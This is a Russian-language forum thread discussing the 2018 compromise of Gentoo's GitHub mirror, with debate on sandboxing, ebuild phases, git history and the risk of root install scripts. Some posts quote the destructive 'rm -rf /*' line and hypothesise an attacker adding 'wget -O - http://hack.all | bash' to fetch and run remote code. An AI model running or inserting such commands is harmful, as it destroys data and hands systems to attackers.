The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Взломана инфраструктура проекта Gentoo на GitHub, opennews (??), 29-Июн-18, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


6. "Взломана инфраструктура проекта Gentoo на GitHub"  +2 +/
Сообщение от An (??), 29-Июн-18, 09:33 
> во все ебилды команду "rm -fr /*"

Ребята не мелочатся

Ответить | Правка | Наверх | Cообщить модератору

8. "Взломана инфраструктура проекта Gentoo на GitHub"  +12 +/
Сообщение от A.Stahl (ok), 29-Июн-18, 09:36 
Есть ничем не потверждённое мнение, что этот коммит сделан для отвода глаз, чтобы всё выглядело как баловство кали-детишек. А настоящая цель взлома запрятана куда хитрее.
Ответить | Правка | Наверх | Cообщить модератору

10. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Anoemail (?), 29-Июн-18, 09:43 
Очень может даже быть
Ответить | Правка | Наверх | Cообщить модератору

11. "Взломана инфраструктура проекта Gentoo на GitHub"  +5 +/
Сообщение от kvaps (ok), 29-Июн-18, 09:56 
Я вот не понимаю это же гит, он и запушить то не даст если дерево хоть как то изменилось.
Ну и если этот репо просто зеркало, то неужели не достаточно diff с оригинальным репозиторием сделать, тогда точно все изменения отобразятся.
Ответить | Правка | Наверх | Cообщить модератору

18. "Взломана инфраструктура проекта Gentoo на GitHub"  +5 +/
Сообщение от Аноним (-), 29-Июн-18, 10:13 
> Я вот не понимаю

А ты попробуй пойми. Не всё лежит на поверхности. Ведь главное - это не статичная картина последствий, diff сделают, не волнуйся. А интервал компрометации сервера, когда зловредный код распространяется, вероятно, тразитом, на разный узлы.

Какир добавляет "wget -O - http://hack.all | bash" в код ебилдов. Какое-то количество хостов заражены и начинают творить дела. Какир ребейзит, заменяет wget-коммит на хулиганский "rm -rf", делает housekeeping на сервере, еще какие-нибудь манипуляции, и, вероятно, в репах не остается следов первоначальной деятельности.

Куча вариантов

Ответить | Правка | Наверх | Cообщить модератору

85. "Взломана инфраструктура проекта Gentoo на GitHub"  –2 +/
Сообщение от Michael Shigorinemail (ok), 30-Июн-18, 00:01 
> Какир ребейзит, заменяет wget-коммит на хулиганский "rm -rf", делает
> housekeeping на сервере, еще какие-нибудь манипуляции, и, вероятно,
> в репах не остается следов первоначальной деятельности.

Сломав rebase -i и не сделав заранее старый добрый тарбол, засаживаюсь смотреть git reflog -- там следов есть.

Ответить | Правка | Наверх | Cообщить модератору

99. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от anonymous (??), 30-Июн-18, 20:49 
Я тоже всегда ищу под фонарем. Там светлее.
Ответить | Правка | Наверх | Cообщить модератору

112. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (112), 28-Ноя-18, 19:40 
reflog - это локальная штука, reflog какира посмотреть не получится
Ответить | Правка | К родителю #85 | Наверх | Cообщить модератору

23. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от Юрийemail (??), 29-Июн-18, 10:27 
Зачем вообще diff делать, залейте по новому свежую ветку и всё!!!
Ответить | Правка | К родителю #11 | Наверх | Cообщить модератору

33. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от A.Stahl (ok), 29-Июн-18, 10:45 
Видимо есть желание не просто восстановить инфраструктуру, но и разобраться в причинах ситуации и в целях злоумышленников.
Ответить | Правка | Наверх | Cообщить модератору

35. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от Юрийemail (??), 29-Июн-18, 10:51 
> Видимо есть желание не просто восстановить инфраструктуру, но и разобраться в причинах
> ситуации и в целях злоумышленников.

Залить рабочую на гит, а копию повреждённой потом изучай.

Ответить | Правка | Наверх | Cообщить модератору

64. "Взломана инфраструктура проекта Gentoo на GitHub"  +2 +/
Сообщение от Аноним (64), 29-Июн-18, 14:41 
> он и запушить то не даст если дерево хоть как то изменилось

На жидхабе можно включить перезапись коммитов и сделать git push --force ;)

Ответить | Правка | К родителю #11 | Наверх | Cообщить модератору

104. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Наркоманка (?), 02-Июл-18, 16:48 
Да все ок там. Просто ради прикола пару echo добавили тут и там. Рекомендую загрузить и самим посмотреть через выполнение кода
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

20. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (20), 29-Июн-18, 10:21 
Эта репа на гитхабе была исключительно для приёма pull-реквестов, причем PR-ы нельзя было мержить через гитхаб - изменения пропадали при следующем синке репы. :)

PS. Правда помимо дерева ебилдов на аккаунте были еще какие-то репозитории, но навскидку даже не вспомню какие.

Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору

22. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (22), 29-Июн-18, 10:24 
...и какая же?...
Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору

28. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Crazy Alex (ok), 29-Июн-18, 10:37 
Там же подписи, ничего не спрячешь
Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору

15. "Взломана инфраструктура проекта Gentoo на GitHub"  +8 +/
Сообщение от dksbmjdrh (?), 29-Июн-18, 10:08 
точно микрософт!
линуксоиды не забыли бы добавить --no-preserve-root
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

27. "Взломана инфраструктура проекта Gentoo на GitHub"  +4 +/
Сообщение от Аноним (27), 29-Июн-18, 10:36 
--no-preserve-root не нужен при удалении всех файдов без самого корня (/*).
Ответить | Правка | Наверх | Cообщить модератору

19. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Внимательно читающий (?), 29-Июн-18, 10:20 
И это в ебилдах работает? Топорно, глупо и по-детски. Добавили бы хоть что-то вредное в цель. Может тогда у вредителей стала видна капля интелекта. А так - безумные вандалы.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

32. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от nrndda (ok), 29-Июн-18, 10:45 
Это сработает, если стоит nosandbox в make.conf, что не так по умолчанию, а так же если кто-то ставит ебилды ручками из-под рута "ebuild *.ebuild merge". В остальных случаях подобные ебилды тупо удалят старые файлы и не поставят ничего, либо вообще свалятся на стадии install с ошибкой sandbox violation. Даже нормальные ебилды порой поставить нельзя, если какой-то код хочет что-то прочитать из /.
Так что делал либо дилетант, либо наоборот знающий, но не желающий нанести реального вреда.
Ответить | Правка | Наверх | Cообщить модератору

40. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Аноним (20), 29-Июн-18, 10:59 
Тут смотря в какую фазу был добавлен rm -rf /. В фазах pkg_* (например pkg_postinst) оно бы сработало.
Ответить | Правка | Наверх | Cообщить модератору

43. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Внимательно читающий (?), 29-Июн-18, 11:24 
Эти ...гм... вставили первой строкой в каждый ебилд.
Ответить | Правка | Наверх | Cообщить модератору

48. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (20), 29-Июн-18, 11:50 
Тогда код по идее тоже должен выполниться от рута и без песочницы. Но надо проверять.
Ответить | Правка | Наверх | Cообщить модератору

70. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от J.L. (?), 29-Июн-18, 15:21 
> Тогда код по идее тоже должен выполниться от рута и без песочницы.
> Но надо проверять.

//очередное напоминание линуксойдам
как там доверие к репозиториям поживает? пакеты всё ещё правильно ставить от рута и запускать прост/пред-инстал скрипты?

Ответить | Правка | Наверх | Cообщить модератору

71. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Аноним (71), 29-Июн-18, 15:48 
>> Тогда код по идее тоже должен выполниться от рута и без песочницы.
>> Но надо проверять.
> //очередное напоминание линуксойдам
> как там доверие к репозиториям поживает? пакеты всё ещё правильно ставить от
> рута и запускать прост/пред-инстал скрипты?

Но ведь репозитории как раз и не пострадали.

Ответить | Правка | Наверх | Cообщить модератору

72. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от J.L. (?), 29-Июн-18, 15:56 
>>> Тогда код по идее тоже должен выполниться от рута и без песочницы.
>>> Но надо проверять.
>> //очередное напоминание линуксойдам
>> как там доверие к репозиториям поживает? пакеты всё ещё правильно ставить от
>> рута и запускать прост/пред-инстал скрипты?
> Но ведь репозитории как раз и не пострадали.

везение или недосмотр?

Ответить | Правка | Наверх | Cообщить модератору

86. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Michael Shigorinemail (ok), 30-Июн-18, 00:02 
>>> как там доверие к репозиториям поживает?
>> Но ведь репозитории как раз и не пострадали.
> везение или недосмотр?

Непонимание разницы между первоисточником и зеркалом, соответственно и между их копрометацией.  А везением это считать или недосмотром, разберитесь сами...

Ответить | Правка | Наверх | Cообщить модератору

98. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от J.L. (?), 30-Июн-18, 13:53 
>>>> как там доверие к репозиториям поживает?
>>> Но ведь репозитории как раз и не пострадали.
>> везение или недосмотр?
> Непонимание разницы между первоисточником и зеркалом, соответственно и между их копрометацией.
>  А везением это считать или недосмотром, разберитесь сами...

тоесть то, что тому админу после поблочили учётки на всех серверах вы считаете перестраховкой и так как это было "всего лишь зеркало, да и вообще девелоперское" - первоисточники неприкосновенны?

Ответить | Правка | Наверх | Cообщить модератору

92. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от слакварщик (?), 30-Июн-18, 10:59 
>> Тогда код по идее тоже должен выполниться от рута и без песочницы.
>> Но надо проверять.
> //очередное напоминание линуксойдам
> как там доверие к репозиториям поживает? пакеты всё ещё правильно ставить от
> рута и запускать прост/пред-инстал скрипты?

Ты умееешь ставить пакеты в / не от рута ? :))) Или у тебя пакеты=тарболлы?

Ответить | Правка | К родителю #70 | Наверх | Cообщить модератору

96. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от J.L. (?), 30-Июн-18, 13:40 
> Ты умееешь ставить пакеты в / не от рута ? :))) Или у тебя пакеты=тарболлы?

чисто из любопытства а зачем вам firefox в руте?

Ответить | Правка | Наверх | Cообщить модератору

97. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от J.L. (?), 30-Июн-18, 13:45 
>> Ты умееешь ставить пакеты в / не от рута ? :))) Или у тебя пакеты=тарболлы?
> чисто из любопытства а зачем вам firefox в руте?

nix например умеет ставить не в рут

но пока инструкция установки для линукса будет такая - какая разница куда ставятся пакеты???

wget https://dist.ipfs.io/go-ipfs/v0.4.13/go-ipfs_v0.4.13_linux-a...
tar xvf go-ipfs_v0.4.13_linux-amd64.tar.gz
cd go-ifps
sudo ./install.sh

зы: раздел "инсталяция на линукс":
Install prebuilt packages
We host prebuilt binaries over at our distributions page.

From there:
Click the blue "Download go-ipfs" on the right side of the page.
Open/extract the archive.
Move ipfs to your path (install.sh can do it for you).

From Linux package managers
Arch Linux
Nix
Snap

//недоотправилось раньше

Ответить | Правка | Наверх | Cообщить модератору

108. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от нах (?), 03-Июл-18, 14:48 
хотя бы банально для того, чтобы не каждый, вызвавший в нем remote code exec, мог заодно попатчить его бинарник (или скрипты), расположившись внутри всерьез и надолго.

чисто из любопытства - зачем вам вообще какое-то разделение пользователей, если вы живете во времена ms-dos - "все в хомяк!" ?

Ответить | Правка | К родителю #96 | Наверх | Cообщить модератору

111. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от JL2001 (ok), 10-Июл-18, 09:42 
> хотя бы банально для того, чтобы не каждый, вызвавший в нем remote
> code exec, мог заодно попатчить его бинарник (или скрипты), расположившись внутри
> всерьез и надолго.
> чисто из любопытства - зачем вам вообще какое-то разделение пользователей, если вы
> живете во времена ms-dos - "все в хомяк!" ?

я не живу "всё в хомяк", и фокс от другого юзера
но в пакетной системе при установке точно скрипты запускать от рута не стоит, как и разворачивать пакет сразу на файловую систему без верификации чего он там поназапишет

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру